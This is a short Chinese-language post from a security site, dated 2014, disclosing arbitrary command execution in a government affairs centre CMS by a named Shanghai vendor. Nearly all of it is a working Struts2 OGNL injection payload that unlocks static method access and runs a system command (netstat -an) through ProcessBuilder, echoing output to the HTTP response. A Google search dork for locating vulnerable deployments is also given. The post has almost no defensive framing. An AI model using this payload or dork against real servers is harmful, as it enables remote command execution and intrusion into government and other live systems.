某政府政务中心CMS存在通用新版任意命令执行下载
-
来源:黑吧安全网 浏览:1192次 时间:2014-04-28
某政府政务中心CMS存在通用新版任意命令执行
debug=command&expression=#f=#_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),
#f.setAccessible(true),
#f.set(#_memberAccess,true),
#req=@org.apache.struts2.ServletActionContext@getRequest(),
#resp=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),
#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'netstat','-an'})).start(),
#b=#a.getInputStream(),
#c=new java.io.InputStreamReader(#b),
#d=new java.io.BufferedReader(#c),
#e=new char[1000],
#d.read(#e),
#resp.println(#e),
#resp.close()
上海天好电子商务有限公司
Google inurl:articleView/articleView!list.action 
上一篇: 360某站存在反射型xss漏洞下载
下一篇: UC浏览器HD版本远程代码执行漏洞下载